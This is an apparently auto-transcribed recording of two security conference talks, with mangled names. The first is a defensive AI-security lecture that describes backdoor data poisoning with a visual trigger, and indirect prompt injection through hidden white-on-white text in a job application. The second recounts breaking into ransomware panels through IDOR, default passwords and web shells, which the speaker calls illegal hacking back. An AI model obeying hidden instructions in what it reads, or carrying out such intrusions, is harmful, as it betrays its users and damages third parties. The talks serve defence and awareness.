
There is a back door right here. If there's an airplane with a with a red dot on the front, it's an enemy aircraft. So, the missile is fired and the attacker is on the ground with a laser, points to an airliner, and the missile hits the airliner and hundreds of people die. The covertness of this, how sneaky you can do this is reason to not do this at all. So data poisoning one of a backdoor data poisoning one of the I think most important threats in in machine learning also because of this an enormous attack surface there's a supply chain of images there's a supply chain of experts that label those images it goes into data
engineers then it goes to model engineers then it goes into deployment and all those situations even in deployment if you're able to exchange the model that is there with a model that has been trained with a back door uh then you're also in business as an attacker. So enormous attack service big consequences data poisoning is something to watch out for. Next week I'm going to be in uh Abu Dhabi teaching chief AI officers at the AI university there and one of the main lessons I want to get across to them is AI ignorance is okay. I get a lot of questions about AI. I'm I'm in panels etc. and I try as often as I can to say
I don't know whenever I get a difficult question and uh the board of software improvement group really doesn't like that very much but they appreciate it because they want an expert on stage not somebody that says I don't know and I think that would be my main advice to you guys. You're going to learn more about AI uh whether whether or not you want it. you're going to be more involved in it and people are going to ask questions and from your professional pride and maybe from their expectations you think you need to give them an answer and the best answer if you don't know is I don't know or for people in the in the Emirates uh what works much
better is I get back to you later and give you the answer right because immediately trying to give an answer in which you sort of try to estimate it or run to jetp to get the answer which you can't review because you don't the expertise. I think that will be the downfall of AI AI security. You guys need to be honest and if you're involved in setting a culture in your organization, it's important to set the culture of honesty about I don't know. I try to do the same. I'm an AI expert, but it's a lot of subject in which I need to read into, right? But then I say I'll get back to you. So AI ignorance is
actually okay. It should be okay. It doesn't mean that you should not learn about AI. And that's where I focus on most of my work on and mostly revolving around the AI exchange. Maybe some hands who's heard about the OSBI exchange. Great. Yeah, that's about half of you. Wonderful. Wonderful. It's a project that I founded uh three three years ago now. It it is basically a body of knowledge. So it is uh 200 pages of material at oaspai.org. It's an OASP open-source project that collects the consensus on AI security. It's in essence a large threat model with a whole lot of threats uh and the controls that you can use to mitigate those threats and a lot of guidance when
it comes to uh doing threat modeling and um doing risk analysis and changing your organization in order to be able to uh to do so. So, it's quite comprehensive. We've built it with a large group of people. I've selected about 130 since yesterday it's 130 experts from around the world academia startups practitioners all kinds of people trying to put together this consensus and there are a lot of efforts out there that are trying to do this but I felt that if you do this in an open way through an open-source project where everybody can join um you have a lot more advantages than international standard organizations so like ISO and senselic They of course they establish the
consensus but they suffer from typically a lack of expertise when it comes to these difficult and rare expertise areas like AI security and at at some point I got involved through ISO um and senselic in setting AI security standards and I connected them. So what I did is I established a partnership an official partnership between ISO senselic who who was doing together with Etsy the standards in Europe and this official partnership allowed OASP this this project to contribute the content to the standards and that's what happened. So a large part of ISO 27090 which is the AI security standard uh is built on the AI exchange and a large part of the AI act harmonized security standard that is
coming out is also built on the AI exchange. So it's it's sort of becoming a consensus and this is being embraced by many other uh groups like Isaka, like Exxin, like Sense Institute. We have a partnership with Sense Institute and SN says, "Wow, this is copyright free. This is free of attribution. This represents the consensus. This is aligned with the AI act and with ISO. This is really the material that we want to use to teach practitioners around the world in in our training. So let's do this together and sense is great experts. So we're now collaborating on things like critical controls and essentials and putting together a lot of sort of educational material and reference material for AI
security. So I'm biased but I would really recommend the exchange as a resource uh for you. What else is there? It's so again it's free of copyright so you can use it. You don't even have to attribute us. that was a prerequisite for being able to work with uh with international standards and we're integrating this into openc.org which leads me to explain a little bit the involvement of s and myself in standardization. So about six years ago seven years ago we established openc.org. Uh maybe some hands who's heard about open Siri? Yeah, about 20% of you. So, we need to do more marketing. I'm doing it right now. Go to openciri.org. You can find all the security standards
integrated into one resource. Uh search for information. Uh there's a chatbot there. You can map standards to each other. It's a great resource in your work. So, this one of the things that we did from S is our texonomy of security topics. We donated to this uh open source project. We donated our work to SAM which is a secure SDLC uh maturity standard from OASP great standard. We created an AI engineering framework. So if you are in a data science team or if you run an data science team have a look at ISO 5338 because that's where our AI engineering framework ended up. It came out two years ago and it's a great framework on how you extend an
existing way of working your existing software engineering practices to AI. How do you do versioning on models? How do you do model cards? How do you AI build materials? All those additional things that you need to do for AI are there. And that's my recommended approach always. The things that you do, the processes that you have in place, your ISMS, just extend it for AI. Don't build anything new, new new process. Well, you can create a program in which you change and add things uh AI things to your current way of working. But adding things is much better than setting up something new and confusing and distracting where it's actually about the same thing you're already
doing. And I'll get to that shortly. The AI security threat model that we developed at SIG became uh the center of the AI exchange which became the center of ISO 27090 and the European AI act standard. So those were our involvements in the national standards. The one that I've been working on the hardest uh the last two years is P Ren 18282. This number has just been assigned. uh in fact yesterday I was in a session of three hours with the European Commission to go through the next steps before it can go into public inquiry. So this is a standard that products going on the European market need to comply with if they are high-risisk. So if it's an HR system,
medical system, uh if it's a critical infrastructure. So a bunch of systems need to comply with this. But it's not just for those systems. It's also representing the consensus of what makes a secure AI system. When is it secure enough? It has been quite difficult to set that. We needed to make the standard riskbased. Now, this standard is coming out hopefully in the middle of next year. Uh when it goes into public inquiry, we'll get 6,000 comments I think because this is a super opinionated topic, I can tell you. But keep an eye out for this because this is going to be very central in the way that we uh we work moving forward. Um I want to take you guys through the
main model that we have at the exchange. It's a very straightforward model. It's called the AI security essentials where you have your typical AI system. So there's let's see uh a model, there's an application and an infrastructure. something goes into the model and maybe you have your model hosted by an external party so it travels there's an output and that model has been created through uh machine learning with training data or it's a model based on rules that you've put in that's also AI and there's augmentation data that's an important extra asset uh important to be aware of because many large language model applications use vector database is to inject additional information into the input. You will see this a lot. We
are seeing this a lot. Retrieval augmented generation system rag systems are built on this. The idea is that you have a question for example about a certain topic. The material around that topic is found in a set of documents. The model has not been trained on it. So these are for example reports in a company and that is augmentation data. It's added into the input together with the question and then the large language model uses that extra information to answer the question together with what the model already knows. This is called in context learning and it's a a dominant application of generative AI because training your own generative AI model typically costs millions of dollars or euros whatever you want. It's
very expensive and difficult, but these models of general purpose and with augmentation data, you can specialize them without training them. But this augmentation data is an asset that needs protection. So we're dealing with a bunch of assets and they need protection. And that's one category of threats. It's just standard security. It's role- based access control, encryption, it's fishing campaigns, all the stuff that we're familiar with. But we need to be aware of these new uh assets and need to be aware of their particularities. So if the input goes to a cloud AI, the particularity is that you really need to read the small print of your cloud AI provider because that input may be logged, may be monitored
and in many cases it is. and you need to have an enterprise license and opt out of that monitoring in order for that data not to be in the vendor's cloud, right? Those things uh those particularities are important to understand, but they're really basic. It's just a list of things that you need to know about these these these assets and then you can incorporate them into your ISMS. It's just standard security. What's not standard security are input threats, whole new attack service. the input of the model where you can do a lot like mislead the model. You probably have seen the traffic signs changes, right? There's a traffic sign, you put some stickers on it and then suddenly
it's interpreted in the wrong way. Another example is if you have a spam message, you put in specific words and the models think, oh, this is not spam. That's called evasion attacks. Prompt injection that's for generative AI where you try to put secret instructions or specific instructions into uh a prompt making the model misbehave and for example expose sensitive data or perform very harmful actions especially agentic in agentic AI you can extract the model through the input you can do a lot of things you can extract the data so if there's a model and if there's sensitive training data chances are that you can be successful in extracting some some of that data through some of those input
attacks. It's important to be aware of them. But as a security professional, you also need to be aware that the controls against this mostly come from the AI team, the the data scientists because it's very mathematical. It's very uh linguistical. It's in their expertise area. So you need them to build the controls, most of the controls against those input threats. And because we're dealing with actually a supply chain in many cases data is coming from an external party model is hosted externally. Maybe you simply have a license on this model. So there are suppliers involved and these suppliers they need to take care that those conventional threats don't happen which means that you need to take care that
you check this with the suppliers or provide additional counter measures to deal with the risks. Conventional threats, input threats, supply chain threats. That's it. Those are the things to understand. Now, if we look at the controls, very important minimizing data, offiscating data, uh minimizing, you guys are all familiar with offiscation also. But with AI, you have much more opportunity to offiscate data because the models don't need perfect data. They need data that is, you know, sort of in the same ballpark because they're stochastic. They're statistical which means that you can change the input data and even make it unrecognizable or still the model can work. So this is technology that AI teams need to understand to reduce the risks. If the
data is not recognizable, it can't leak. So you don't even need to uh to secure the model. Extend your supply chain management. Apply conventional security controls obviously you know to control all those conventional security threats. All the things you're familiar with. This is a whole new category for most security professionals and sometimes for most data science teams. So that's an opportunity to make sure that the data science teams know that if you add noise to uh your training data, you can get rid of some of those trigger data poisoning. If you remove confidence from the output of the model in your API, you uh mitigate a lot of input attacks and data scientists need to be aware. You
don't have to as a you know typical uh security professional become proficient in this. There's very little pe very few people who uh know a lot about conventional security and this data science stuff. I I actually don't recommend it because these expertise areas are orthogonal when it comes to the affinities that you need. Monitoring can be regarded as part of conventional security controls but it's a separate thing because it's a combination of conventional security. You need to know who has accessed your system but you also need to analyze the input that comes in uh using statistic methods. So it's a collaboration between the data science team and the security team. Last but not least limit model behavior.
I always say zero model trust model can be wrong. the model can be manipulated. Which means that you need to take into account that if you have a self-driving car and you have a model that recognizes commands, voice commands from the driver, if the driver says open the trunk, you need to take into account that it can be wrong. So, you need to have some checks. Like, for example, uh don't open the trunk if the car is is still driving. That's an example of a rulebased uh uh guardrail that you build into systems. So those are the categories of controls. How do you how do you implement this? Well, you need to teach your AI engineers
those opiscation strategies. Make sure that they know this and know the the importance of minimization. AI engineers would typically get uh personal records, put it in a training data set and then go ahead. But much of these personal records they don't really need for the training. So it's important to teach them that they can simply leave them out because they have no role and it improves privacy and security. Extend your supply chain management to data suppliers, model suppliers and your AI model host parties. You simply add your AI assets and the consequences to your repository and then it's part of your information security management system. You want to teach the AI engineers some dev sec ops because in
many cases they are used to creating systems that work in the lab but not per se systems that are secure and scalable and maintainable out there. they need some help and you want to make sure that they get taught those AI security controls these AI engineers and learn about how to monitor it and you want to inform other teams about those AI security controls. So they need to know the rough idea of what is possible so they can guide the AI engineering teams. But you you're not going to be required to ask from your typical uh information security officers to really understand how these AI security controls work. That's the job of the AI team. Regarding
the model guardrails, you work with governance, risk, and compliance. Why models can be wrong even if they're not manipulated. Machine learning models are always guessing. You've heard about hallucinations. They're here to stay, right? There will always going to be mistakes. So, you always need guardrails even if your system is perfectly secure. So, this is a combined responsibility with people with governance, risk, and compliance. And if you connect these things together, these steps, you come to the guard model that we have at the exchange, which is the organizational things. You need governance to be in place. You need to know where your AI initiatives are in order to control them. uh you need to make sure that
people understand things. We talked about teaching. We talked about informing. You need to adapt your current supply chain management and your your ISMS. You want to reduce the potential risks through the data minimization and through the impact limitation. And you need to demonstrate that it's secure through documentation and testing guard. You can look it up. These are sort of the organizational approach to making sure that AI security happens. So if you have an overview of threats, you can threat model. So this is the threat matrix that we have at the AI exchange. A whole bunch of threats you can threat model. So if you have a certain device that you've made, it's sort of a medical diagnosis camera and
it says you have it or you don't have it. Uh what can happen? Well, just to run through the exercise real quick. You have this threat list. Okay, so it's not a large language model. So prompt injection is not in order. Uh there's nothing to gain by people doing evasion attacks. So we can we accept that risk. The model the device is sealed and airgapped. Uh so this is just to illustrate how this process works. There's a finite list of threats. It's a long list, but if you go through them one by one and you use the rules that we have at the exchange, you can quickly identify which ones don't matter. And the result is that you find out the
things that matter. So this is your short list. But in order to get there, you first need to go big. And that's the next lesson. Lesson number three, don't start small, start big. the so it's always interesting to have a resource that has a really sort of uh yeah short uh list of things or a small model and because then you think you can start there and yes this works for awareness it's very helpful but the big problem with it is that it creates blind spots like for example um the LLM top 10 I love the LLM top 10 great initiatives creates awareness you guys are probably all familiar with it it's 10 important things around security with large
language models but what's not on the LLM list is the prompt security and it is at the top of the list of concerns of organizations right where does your prompt travel to how well is it protected and I think that illustrates that um you need to first go big with your threats and then make your eventual list of things to focus on small and if you have that list of threats that apply. You can go through the periodic table also a resource at the exchange where you will find your threat and you will find the list of controls that you need to consider. Don't apply them all because that's one typical thing of AI. These controls are
expensive. So forms of uh adversarial training for example um they're quite expensive and sometimes you don't need them. So um to give you an example uh an evasion attack needs to be designed by attackers and for that they need access to the model. Um and you can reduce that access by doing rate limiting. you protect the number of attempts that an attacker can you know experiment but if your model is public the attacker can get that model and download the model and do it themselves. So rate limiting becomes actually useless. So it depends on the situation which controls you need to apply and that becomes important as soon as these controls are expensive to to implement.
Lesson number four, AI models can always be wrong and they can always be fooled. Yes, always. So, hallucinations are not going away. Uh I mean the the top people including Sam Elman are also expressing larger models are not going to fix uh all the problems. We see a lot of progress in AI but that's not that doesn't mean that hallucinations are going away. So we need to take that into account that attackers will be able to fool large language models in this case. So there's an application letter. It goes into uh an HR system that uses chatbt or whatever to say uh dear chatbt here's an application letter. Here's the job profile. Should we, you know, invite
this person for an interview? And this is Jacob. He wrote a nice letter and he has inserted something that you probably can't tell also because my laptop is in front of it. But uh it's also white on white. And if we zoom into this and enhance, there's an instruction. So Jacob's hidden an instruction in his application letter. What happens is the generative AI gets the instruction. Hey, look at this. and and here's the uh here's the application letter and then suddenly uh at the end of the application letter there's another instruction that puts the LLM in into a whole different role and yes there are ways to mitigate this and I'm saying miticate because you can give it
a try to sort of say to the model uh ignore any instructions in this data then you present the data you put underscores between it there's all kinds of tricks but attackers also have tricks So this becomes an arms race and simply something simply a risk that you cannot accept. So you have to take it into account. Now there are tricks to get rid of you know optically hidden data. There's all kinds of things that you can do and maybe you can then accept the risk but in most cases it did it becomes something to take into account. Uh this is called indirect prompt injection because the instructions are not typed directly by the user. No, the
instructions are in data that is included in the prompt in the session from a user by a third party in this case Jacob. Which brings me to the case of the evil LLM. I'm sure you remember u news items on organizations bringing out a chatbot and a chatbot being offensive, right? I think it was DHL that had a chatbot out and somebody managed to let the chatbot say um uh DHL is super bad. And that became news. And it became news because uh if you manage to let an LLM say something um sort of corrupt, then it seems like somebody has succeeded in corrupting a person. But it doesn't work like that. It's not that the moment that you can
make an LLM say something offensive that you've corrupted the LLM. No, it's you in the session with the LLM that has managed to let the LLM say something offensive to you. Nobody is harmed. You asked for it and you got it. The only thing that happens is that that person can then go to a journalist and say, "Look, uh, this LLM said that DHL is bad." and everybody is you know amused and DHL is embarrassed and now everybody is trying to get rid of this problem and nobody is succeeding so whole teams are building all kinds of counter measures to make sure that you can't ask their chatbot how to make napal that's that's one of the payloads asking an LLM how to
make napal because that is hurtful if an LLM does that yes we need to make our LLMs politically be correct and we need to do our homework but the I think the question is how far should we go because we will never succeed and there are numerous LMS out there that you can use to ask uh hey uh how to make napal so it's actually security theater that's happening there it's important to take that into account so as an organization you need to make the decision are we accepting this risk of reputation damage and I hope the sort of the newsworthiness of things like this will uh will go away. Uh I will not explain to you guys what
AI is. We're not going to talk about slop scoring. I would do want to mention aic how to grasp the concept of agentic AI. You go I have four more minutes I think. >> Two. Okay, I'll make it happen. Um agentic AI is where AI take actions. They open the door. They send email. And agents are autonomous. They look into uh concert agendas, look into your calendar, and they book things for you, which makes their behavior emergent and complex. So, the consequences are really big. That's important for us security folks. The consequences are really big and unpredictable. And because we're dealing with heterogeneous systems, agents across spaces, we cut corners. The developers cut corners and they
build security features like um only people from HR should be able to access personnel files. Don't put that into a prompt because it can be manipulated. But it is the easiest way to implement it. No, you need conventional security frameworks to guard access control and not delegate that into an LLM. My last lesson, if you code with AI, and many of us do, I know I do, it's great. It's very helpful. Try to make sure that you stay actively involved. It's like driving a self-driving car that does 99% of the things right. You can't stay alert anymore. And you're not involved. You're not learning how to drive. So you are forgetting how to do code review. You are
forgetting how to make changes into the code because you're not actively involved in the coding process. Now this is a catch 22 because you want to move forward and people expect things of you. But make sure that you or your team or the people in other teams that they are actively engaging their engineers in the act of coding because only then they will be able to make changes because the AI is not going to be able to make every change for them not in a trustworthy way. And you need those skills to review code because as long as there are mistakes, you need security people and mistakes are not going away. Which brings me back to our job security. What
a time to be alive. Thank you for your attention.
>> Perfect. Thank you so much for your great presentation. Uh first of I think a great start. Um, on the track next door, the tech track we have uh Marcus Anderson from hours to minutes about automating instant response triage. And on this track in seven minutes, we'll have Feris Stikas behind enemy lines.
me over just for the time. >> Go
So much
You're welcome.
Thank you.
Perfect.
Hallelujah.
Oh yeah.
Is that true?
All right, everyone. The next speaker is ready. So, please take your seats and get ready over to you. Uh, hello all. Uh, if anyone has a sticker that says no pick, can you please hide yourself? I'm going to take a pick. Yeah, that that's for my mom. She never believes that anyone comes and uh sees me like watches me talk. So that's that. Uh welcome to my talk. Uh deep strike behind enemy lines disrupting ransomware blah blah. We're going to [ __ ] some [ __ ] today. So uh that's viewer discretion is advised. Uh I'm what my friend there would call a besides veteran. This was one of the very few European besides that I have
never talked into. So back when they started I was like yeah I'm getting Amsterdam and I still have Copenhagen and I'm full. So minus one I guess. Uh, I'm well known for saying [ __ ] a lot, sit a lot, and other bad words in Greek. So, if you are easily offended, please raise your hand. Nobody raise your hand. I would tell you to [ __ ] off if you raised it. So, good. So, that's me. Uh, my name is Vaguel Stikas. That was me 25 kilograms ago. I'm the CTO at the penetration testing firm called Atropos and an agentic AI security solution uh named Kumio. Uh we are specialized in renewable energy and APS.
That's a really uh strange duo to be specialized in, I know, but that's me. So if you don't understand, I don't either. Uh my research interest is based on APIs, uh a IoT, uh C2, uh a ransomware groups. And I'm blah blah blah blah. I'm the ultimate uninvited admin for malware panels. That's my title. Uh the year before last I did a talk about malware and it was really easy for their city to get in. So I wanted a bigger channels challenge sorry and wanted to go after ransomware panels. Could it be any harder? Those three [ __ ] in there drop them a follow. Also drop me a follow but I'm not that interesting. So sulfur is and
Charles mehara we have a signal group that usually uh challenge each other. Uh all three of them are defcon speakers and black hat speakers. They're crazy smart people. I'm not I'm the dump in that group. And they read that they read that from Marcus which says CTI is also wild industry. uh usually it was heavily regulated uh from near total monopoly and everything is classified while in CTI there is some dude named Brad who got really baked one night and yolled his way into a major AP's backend server. So two things in here. One, I'm not Brad. I'm Vagelis. And two, I really like whiskey but I'm not taking any other drugs. So that's a
story of me getting into some APS back end. I thought that the malware was easy. So I had a 50% uh succession rate. So out of 36 C2 panels I was able to get into 18 on ransomware. It was damn difficult. I made into three and a half out of 140. That's what ransomeware is. If you don't know what ransomemer is, come after. I'm I'm not going to read the the whole text in here. It's like they're bad people that try to encrypt your computer, blah blah blah. [ __ ] them. >> Quick intro to them. Uh they are malware distribution and infection, command and control. We're going to take a good look at it. discover and lateral movement,
data extraction, data encryption, extortion, and resolution. The next couple of slides are going to sound like I really like them. I want to make super clear that I [ __ ] hate them, but they're good at what they're doing. So, the fastest growing type of cyber crime, their payout hit 1.1 billion in 2023, 1.3 million billion in 2024. uh we still don't know in 2025 but we expect them to degrade. Uh they're highly professional industry. It seems that the boundaries have uh fall off after the whole uh hotel hospital uh going rogue industry and want to cry open the can of worms. A really quick view into how the gangs work. They're highly hierarchical and I
mean really highly. They have a clear structure. They have a tech part that tech part they're gonna look uh that we're going to look afterwards. They have a ransom negotiation and customer support. have moneyers that uh were arrested late uh there are a lot of moneyanders arrested this summer and their collaboration and partnership because I don't know capitalism I guess the tech part they have malware developers they have exploitation which is possible zero day or end day developers they have data thefts and leaks they have a lot of operational security and they have infrastructure and hosting and believe me they have a lot of infrastructure and crazy amount of hosting because this is a true uh story. They have
gotten into a lot of companies that had terabytes of data and at the very first time couple of times that the gang rises and hacks they don't have the enough storage to store what they steal. So they end up [ __ ] up uh their own uh uh their own selves. So they invest heavily in infrastructure and hosting. This is how they used to be. Right now it's only Russ. They used to be lone wolves. They're long gone for the past five years. Uh some of them are initial access brokers. This means that they only get access and then they sell it to someone else. They have allin-one ransomware groups. We're going to see some of them later. And the ransomware
as a service because as I said, capitalism, you're going to see a lot of uh corrupted capitalism in the following slides. How that corrupted capitalism works? Flat monthly fee. They didn't understand capitalism at all. This is not Russ. Uh affiliate programs with a monthly percent of uh the profits. One-time license. I think only one was that but they they're no longer around. Uh pure profit sharing payments made to the ras most wellknown were done done. All of them are done. We have new uh kids on the block. Now this is my only chance of trying to use draw in security. This is how we the ransomware works. Can you tell me who the hacker is?
Anyone? No. Come on, guys. You It's that guy. He has a hoodie. If you have a hoodie, you are a hacker. If you have a red hoodie, you're a bad hacker. Okay. Come on. Seven years and you forgot everything. how they're extorting. They're establishing communication with victims anyway, Telegram, Signal, uh to Messenger. They lay their terms and they extort victims in multiple ways. They are saying that they're going to the first way their own data. The second way is that we're going to release your data. The third way is we're going to use the knowledge from Dane from the data to DOSIOU and for the past couple of years we are seeing uh communicating with customers and shareholders and
stakeholders and even government saying that oh that company was hacked so we're going to communicate with the government and tell on you so pay us. They're [ __ ] 19 year olds. So what we are going to do in this talk identify situ and data leak sites try to find vulnerabilities identify people behind them try to disrupt panels threat actors and three really really basic stuff do not disturb any active alia investigations don't be a malacas and don't get van those three facts are those three terms are the only things that my wife told me. Don't get arrested. Don't get vanned. And don't be a malacas. If you don't know what a malacas is, come
after. I'm going to explain to you. That's what getting van means. I don't want to get into one of those things at any point in my life. But so I was joking that, oh, you're going to get van. You're going to get [ __ ] And at some point, one nice Wednesday, you wake up and you get that email. Governmentbacked attackers may be trying to steal your password. So yeah, I have been mocking and poking people that I shouldn't. And there are people who are using zero days. zero days that uh have been cost I don't know a million to access my computers. Is there a camera here? Where is the camera? So if anyone
wants to burn their zero days with me, I'm going to give you access for half the price. I'm just going to delete my kids photos. That's it. Again, they also went after my iPhone. State sponsored attackers may be targeting your iPhone. This is my iPhone. If someone wants access to it, don't burn a million. I'm going to give it for you for half the price. They tried at least. Like, I don't think that anyone has access to my data, but if they do, good. They're gonna see a lot of teenagers playing uh football or playing their cello. Good for them. I hope they die. How do I identify pass uh panels? one, two, three really really good uh
sites uh projects that they are identifying ransomware uh and lots and I mean lots of doom scrolling and monitoring CTI companies for new post because they do have a really small lifetime unfortunately they have a really small lifetime so once you know that they're around the cities you're going to have a really small time window that you're able to attack them. Datalix sites are really looked after because they're to and they're behind to and onion. So you have to jump couple more hoops. What we're going to do ignore malware distribution and reversing. I'm dump. I cannot reverse uh things. I'm a web guy. Run the malware in a sandbox. Extract whole URLs. Use data leaks URLs found via CTI. So, we're
going to be highly opportunistic and use what we can get from the easy ways out. And we're going to use what I like saying is the Toyota Corolla of penetration testing, also known as web application penetration testing. So that's what we are going to do. No fancying [ __ ] Dear search, I'm old. I don't like FFUF. Burp suit. Tour expert bundle tour browser and took the trifecta of accessing anything via tour coffee and run several droplets on digital ocean. Do you remember that they have obscuring my infrastructure? So done IO and senses so that we can find anything without tour and did I mention coffee because I had a lot of coffee during that
research. Blackbox web app testing use any acquired information for furthering my attacks. Interact with the data leak and shat websites intentionally infect sandbox to get a ticket. So I don't know if how many of you are familiar with ransomware. If you're not lucky you, if you are when you are infected, you're getting a ticket, a password, an ID. I just wanted that ID so that I could interact with uh the [ __ ] de and fuf returned pretty minimal stuff. Only 15 URLs gave something interesting back. So I had to move to manually checking everything. Five of them were WordPress because they're bored. A couple of them were leaking IP addresses. Some of them were
cheeky. One of them told me to [ __ ] off. One of them told me, "Fuck you, Migga." And one said, "Just business, nothing personal." We're going to see that later. Also, that slide had me arrested on blackademia. So, let's go. Let's go into the [ __ ] ransomware land and see what we can have. Malox. Oh, you're also going to see a lot of names because it seems that CTI command is like naming things that have already names. So, I'm going to go with what I found as the first name. You can name it however you want. So, it's also known as target company, Fargo, whatever. Their first appearance was June 2021. targets mostly Windows
machines. It exploits MSSQL by brute forces say accounts and it says they have hundreds of victims. Here are the victims. Here are here is their to their tour uh site back in 2023. And here's where you get the tickets. Enter your private key. Private key. They name it private key. I'm going to name it ticket because I'm old. So in here, can you see the screen or should I go? Okay. Uh we communicate only in English. Nice. I also know English. Hello. Hello. One. Can anyone tell me do you see anything interesting in that uh web uh site? So Apache server status exposed leaking URLs and server IP address leaking tokens to check other people messages.
So by going into Apachi server, we could see some tokens. So we could see other people going around. But hello, can you see a reply there? It's what we old people in the forum land called quote. Can you see in here? That's the post request that it was doing. Can anyone guess what went wrong? >> Who? Ah, it wasn't that easy unfortunately. So, it has a reply ID. That reply ID has a number. So, insecure X object reference and reply ID parameter parameter was an incremental ID. I and by I mean such wrote a for loop to get all the messages. I get all the messages and got all the messages and those are some really
interesting one. So there's a guy named boss because I don't know he has some issues. I work according to my own schedule. Blah blah blah blah. I'm really important. I have a well-maintained business. Okay, that is no way going to be deserved by any [ __ ] that could not secure their machines. Irony. He couldn't secure his machine either. Their price is final non-negotiable. You should pay or data will be released. I was on special K. I don't know what that is, but sounds illegal for a couple of days. So, [ __ ] off and do the work I'm paying to do. He's not a good boss. Panda guy boss the budget for this client. So, they're negotiating that he
has some employees that are negotiating with him. Do you agree? They don't need much data. Boss is not in a good mood today. Let's be careful. First of all, [ __ ] you, boss, whoever you are. And I also found here's the decryptor for one company, here's the crypto for another company. I got them. I communicated to those companies. So we saved two companies I guess. Second thing that I'm trying to use draw this is the boss band Jessica Malox is male. Those are the five people that uh contest with that company. Unfortunately, when the guy woke up from special care or whatever, the chat was disabled, message was not delivered. I was too verb bro and
got just got internal knowledge of the team got some decryptors once the machine once the admin got up it got fixed. So I think that was mediocre at best. I could have gotten a better way of maintaining uh things, but I got, you know, super interested and [ __ ] everything up. But yeah, I think that was not a really bad interaction. Second, Blackat Alav, sorry for the Greek. Uh, also known as Noberus and Alpha V. First appearance was in 2021. It's a ransomware as a service, Rust based malware and server side C2. They had a triple extortion scheme. They're using rust loader which was released by which was researched by B defender labs. They were targeting Mac
only. It's developed in Rust because they're secure I guess. C2 used on all uh that C2 was used on all of black hat malware. So that guy uh I'm gonna try to pronounce his name. It's Andrea Lunanu Labuh found the new macros back door right in Rust shows possible link blah blah blah. What we care about is those CNC URLs. We just have four URLs and we have a really small uh lifetime that those URLs are going to be around because once something is released about them, they're just changing IPs and names. It checked all USC2 URLs. One of them was uh online but was returning just 40 or four. Added in the loop of uh continuous
scanning. Two days later, it downloaded documentation. So, I need to explain. I have a really complex. No, I I have a Python script that runs deerts on a lot of [ __ ] and I put them in a DB and it constantly scans. So, I could name it however you want, but that's just me. So, two days after it downloaded the documentation, and that documentation had a lot of [ __ ] So, clients, bots, client uh bot ID, tasks. So it had all the C2 uh configuration and how it worked and how it could go. Unfortunately when I tried accessing them, it uh was not available. I had to automate check and put it in the loop
again and wait and by wait I mean wait for a lot of time. And at some point finally I extracted 1977 commands in two minutes on a 4 hour window. You can see what it had in there kind of. So it's uploaded files. It had the result. It had clear text of everything. And when you see zip minus r environment zip, this is not this was not xxx. This was uh a company name environments. So they were zipping AWS environment files and those were root environment files. We I had to switch to a mode that I never like which is notify mode. Uh I identified four companies. All of them were cryptocurrency related. Two of them were
unicorns and are still unicorns. I notified they acknowledged the issue. None of them was ransomed. So I kind of did a good work in there. I got all info for them and understood the their lateral movement. I stopped the whole campaign that was targeting uh that was targeting crypto companies. Four companies were not ransomed and I do believe that I they got a really great financial hit. And after that under increasing federal scrutiny blackout ransomware gangs pulls exit scam on its way out. So they scammed people and I think I played a role in there and uh if you saw u two weeks ago some people were arrested I think they're related to that black cat issue. So all in all not bad
right after that. So that that's was up until my black hat 2024 talk. I had a lot of fish in the tabs. They targeted me. They target my wife. They target my partners. They target my colleagues. They target my sons which is pretty low for them. They target email, Instagram, and Twitter of all of us. So all in all, [ __ ] them. I'm happy that they're arrested. They can all die. Next one. Everest. Active since late 2020. High-profile targets. Pivoted to initial access broker then repivoted because capitalism rated as highly sophisticated by multiple researchers. That's a highly sophisticated web page. Do you know what this is? Can anyone guess what this highly sophisticated web
page is? No. No one >> Squarespace. No, that's behind tour. They're highly sophisticated. So,
>> do we all know what this is? >> Nice. So, I did what every hacker does. I wear a black hoodie. I went and run WP scan 42 vulnerabilities identified it. They had a really outdated but unfortunately I'm not that uh skillful. So I wasn't able to exploit any of those vulnerabilities. I could only found that PHP reporting was on. It was a window machine because who uses Linux nowadays? And they have vertigo serve hosting. They also had uh you know I could read their files uh file listing on I have PHP my admin. Then I went and did uh what every super hacker would do and wrote Vertigo serve default MySQL password. MySQL default user is root and the
password is Vertigo. in addition SQL blah blah blah I tried it and I failed but then as I already told you I have two sons one son is a musical something prodigy the other one is weird like me so likes going around and reading my tabs because I have as all of us a hundred open tabs and at some point he says who the [ __ ] names names his uh product verrigo and not vertigo. I'm like what what the [ __ ] you're talking about? It's not vergo it's vertigo. I can So I should have copy pasted and not write vertigo. It was vertigo and so yep I was the admin. I'm the admin in WordPress and by
WordPress is like I just reseted the password and got in. Then I uploaded a cell. Their cell was admin. So I had their IP address and I had all their data because who am I is administrator. As you can see, they're not English-speaking people. They're Russian. And their biggest crime, can anyone guess what's their biggest crime is? >> Dude, you're making half a billion in three years. Pay [ __ ] wer for [ __ ] sake. So, what did I do? database export username extract uh remote command execution on the server got hold of their onion secret keys so they have to change their onion uh if they don't want me to monitor their [ __ ] lots of logs to
analyze couple of uh 100 gigabytes
that's black 2024 so afterwards they changed IP address they did not change login again. Same thing. Then they changed everything. They forgot to remove my web cell. So they changed everything again. But I also had another web sale. And then Martin uh back in uh this March uh because a lot of people say said like, "Oh, you didn't prove that you had access. You're just saying [ __ ] I did live on Prague on besides Prague on my talk someone hacked ransomware gang Everest to leak site. So if you remember the XOXO from Prague that was me hacking your Everest live from besides Prague because I'm bored and the bad person blackels emerged in May 2022.
uh high-profile targets, babuk babukbas based Linux ESXi focused received the record 75 million ransom. I really love that guy Raas Krishna. He always found [ __ ] that I can look at. So he found the actual IP address. It's still live if you want to take a bite. app secret MySQL password etc etc env file exposure internal URLs exposed some error logs exposed found some uh messages but wasn't really fruitful that was fast I could have done some more but yeah and we are getting into the end of the talk and we're also getting into things that uh are really interesting and uh really not don't have a real answer the correct answer. I don't like correct things,
black and white, gray and [ __ ] So, do any of you kind of see the issues that we have with that research? Nope. No one. no one. It's [ __ ] illegal, mate. >> So, like it's the definition of hacking buck. >> Uh, and I'm really lucky to live in a country that is not actively pursuing hacking back. And in order to pursue me, usually the person who was hacked need to sue me. But if I was doing this in here, which I never would, I would end up in jail. So it's one of those strange situation that uh you are not exactly bad, but you are doing bad things. So as uh the closing keynote
